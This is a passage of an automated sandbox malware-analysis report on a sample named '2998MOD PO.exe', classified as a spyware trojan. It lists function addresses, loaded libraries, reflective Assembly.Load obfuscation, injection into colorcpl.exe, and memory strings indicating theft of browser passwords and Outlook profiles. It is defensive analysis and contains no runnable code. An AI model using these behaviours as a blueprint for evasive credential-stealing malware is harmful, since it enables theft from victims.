                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D60274
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CCE3F0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D803E6
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7A352
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CB0CF2
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D60CB5
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC0C00
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CBADE0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CD8DBF
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D5CD1F
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CCAD00
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7EEDB
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7CE93
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CD2E90
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC0E59
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7EE26
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CB2FC8
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D3EFA0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D34F40
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D62F30
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D02F28
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CE0F30
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CEE8F0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CA68B8
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CCA840
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC2840
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC29A0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D8A9A6
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CD6962
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CBEA80
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D76BD7
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7AB40
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CB1460
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7F43F
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D895C3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D5D5B0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D77571
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D716CC
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D05630
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7F7B0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC70C0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D6F0CC
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7F0E0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D770E9
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CCB1B0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CF516C
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D8B16B
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CAF172
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CDB2C0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D612ED
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CDD2F0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC52A0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D0739A
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CAD34C
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7132D
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7FCF2
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D39C32
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CDFDC0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC3D40
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D71D5A
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D77D73
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC9EB0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04C83FD2
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04C83FD5
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC1F92
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7FFB1
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7FF09
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC38E0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D2D800
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CC9950
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CDB950
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D55910
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D6DAC6
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D05AA0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D61AA3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D5DAAC
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D77A46
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7FA49
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D33A6C
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D35BF0
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CFDBF9
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CDFB80
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04D7FB76
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4EF7E
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4E75C
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4E2A4
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4E3C6
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4D828
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: String function: 0197B970 appears 262 times
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: String function: 019FEA12 appears 86 times
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: String function: 019C5130 appears 58 times
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: String function: 01A0F290 appears 103 times
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: String function: 019D7E54 appears 99 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04CF5130 appears 58 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04CAB970 appears 262 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04D07E54 appears 107 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04D3F290 appears 103 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04D2EA12 appears 86 times
                Source: 2998MOD PO.exe, 00000000.00000002.1876830848.000000000B5A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs 2998MOD PO.exe
                Source: 2998MOD PO.exe, 00000000.00000000.1704754563.0000000000762000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSWBp.exeF vs 2998MOD PO.exe
                Source: 2998MOD PO.exe, 00000000.00000002.1861503868.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 2998MOD PO.exe
                Source: 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001A7D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 2998MOD PO.exe
                Source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs 2998MOD PO.exe
                Source: 2998MOD PO.exe | Binary or memory string: OriginalFilenameSWBp.exeF vs 2998MOD PO.exe
                Source: 2998MOD PO.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 2998MOD PO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, GuVZeiWWGgyIsVPOZB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, GuVZeiWWGgyIsVPOZB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, GuVZeiWWGgyIsVPOZB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/2@1/1
                Source: C:\Users\user\Desktop\2998MOD PO.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2998MOD PO.exe.log
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\colorcpl.exe | File created: C:\Users\user\AppData\Local\Temp\Ea64OHKq
                Source: 2998MOD PO.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2222639581.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2222496095.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 2998MOD PO.exe | ReversingLabs: Detection: 68%
                Source: unknown | Process created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Process created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Process created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
                Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: colorui.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: mscms.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: coloradapterclient.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\2998MOD PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\2998MOD PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 2998MOD PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 2998MOD PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: 2998MOD PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: colorcpl.pdbGCTL source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560731508.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: colorcpl.pdb source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560731508.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sePlrCtAXqpc.exe, 00000007.00000002.3560434817.0000000000DBE000.00000002.00000001.01000000.0000000C.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562689546.0000000000DBE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2043927456.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2041561877.0000000004929000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 2998MOD PO.exe, 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.2043927456.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2041561877.0000000004929000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SWBp.pdb source: 2998MOD PO.exe
                Source: Binary string: SWBp.pdbSHA256Y source: 2998MOD PO.exe

                Data Obfuscation

                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.cs | .Net Code: TnpYr8bfmj System.Reflection.Assembly.Load(byte[])
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.cs | .Net Code: TnpYr8bfmj System.Reflection.Assembly.Load(byte[])
                Source: 0.2.2998MOD PO.exe.5400000.2.raw.unpack, Uo.cs | .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.cs | .Net Code: TnpYr8bfmj System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 0_2_05648B25 push FFFFFF8Bh; iretd 0_2_05648B27
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_00406155 push ss; retf 4_2_00406160
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_00403270 push eax; ret 4_2_00403272
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_0040227F pushad ; retf 4_2_00402280
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_0040BB30 push eax; ret 4_2_0040BB31
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_00404DCD push ebx; iretd 4_2_00404DD8
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_004066BD push edx; iretd 4_2_004066BF
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_00413F7E pushad ; retf 4_2_00414025
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_00413FC5 pushad ; retf 4_2_00414025
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Code function: 4_2_019809AD push ecx; mov dword ptr [esp], ecx 4_2_019809B6
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04C827FA pushad ; ret 8_2_04C827F9
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04C8225F pushad ; ret 8_2_04C827F9
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04C8283D push eax; iretd 8_2_04C82858
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04CB09AD push ecx; mov dword ptr [esp], ecx 8_2_04CB09B6
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04C8106B push edi; retf 8_2_04C8108A
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04C87AAB push ecx; iretd 8_2_04C87ABE
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4C447 push cs; ret 8_2_04B4C44B
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4019B pushfd ; iretd 8_2_04B4019C
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B55202 push eax; ret 8_2_04B55204
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B43D46 pushad ; ret 8_2_04B43D47
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4CF48 push ebx; iretd 8_2_04B4CF49
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B4BBF5 push ecx; ret 8_2_04B4BBF6
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04B44B06 push edi; iretd 8_2_04B44B07
                Source: 2998MOD PO.exe | Static PE information: section name: .text entropy: 7.708866164549466
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, Yx0GApFkpsOyylP5i8.cs | High entropy of concatenated method names: 'sA2R4ibK34', 'tv1RdkLVgM', 'UXFZDEmtjX', 'URKZ9A06Jg', 'aTiZBUJliv', 'BrRZIM0HI6', 'ejrZb5ZtQ6', 'TWYZO2LRhh', 'EDUZENVdrs', 'l2DZl7rByE'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, BD0tkRyW0NvFS0Kras.cs | High entropy of concatenated method names: 'Ldk3TZ8LQs', 'Dkv3CBQhnb', 'DyfQG8jBBo', 'PJmQAD6PDC', 't5n3LrI8fd', 'BZx3kIeIjZ', 'g0p3gxV9LY', 'pos3JUwNWA', 'lOf3MhhA8g', 'n863cqGgXV'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.cs | High entropy of concatenated method names: 'vcsqj7bqfr', 'uivqv0brPO', 'EwBqH4B36e', 'mjVqZOHhgv', 'qfjqRfwDJk', 'e1Bqxm6JNa', 'nMXqssQLgD', 'nFlqPxrWg1', 'MjlqpYj8Tn', 'CHGqol9Spy'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, f6ijMJHORTQRhNugqL.cs | High entropy of concatenated method names: 'Dispose', 'g9WAKlRnb6', 'XhqVUeR2BV', 'U9vGGhuAMq', 'PPyACj87Kr', 'FScAzneM7v', 'ProcessDialogKey', 'C6GVGjX7Sv', 'jtbVAl4V0t', 'XAeVVB8YJ6'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, WLiWCAcvwIfxDKCaWi.cs | High entropy of concatenated method names: 'ToString', 'igQuLDVyDD', 'kdruUNml9f', 'xjauDtEpHq', 'EgLu93fV1P', 'GCluBUKZmZ', 'oQWuIq4dmV', 'QUhubWyBrw', 'FYWuOUYrsX', 'E4wuEOltyO'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, kyj87KTr7ScneM7v26.cs | High entropy of concatenated method names: 'plCQvxEf01', 'XGaQHXS2hu', 'hm3QZypwaZ', 'aAWQRpvqbc', 'eCoQxjdrmi', 'k7aQsJqiI1', 'a03QPSwyiq', 'bKfQpHlGwW', 'NlwQoeeV4Q', 'dkPQtIBUFL'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, e7iHOazfdRADLFCyRX.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CbFmeSxOJx', 'wdrm18NP2O', 'WNdmuOfnFQ', 'cs1m38lhVU', 'ceUmQxMkAV', 'PQcmmfOJD5', 'g4emaKE7yJ'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, WMgNXPg2RPSOrhK9eh.cs | High entropy of concatenated method names: 'TjKeW6uuhl', 'JXaeNak938', 'DUfe79wOjP', 'JZBeUGwj6a', 'B8ue90HnLg', 'mOSeBFsg97', 'jdKeb4XNuj', 'fLjeOOlJUe', 'zD1elAbgA7', 'SlBeLQwPAF'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, TWS96jZxAX3EN502gS.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NCLVKjoOGe', 'J3aVC65g2J', 'nKvVzcmJkP', 'UdRqGQQncQ', 'ayMqAQjPUp', 'YyuqVjS1j2', 'lq7qqnsDgr', 'AnP8IBzLo4heWACJmJ'
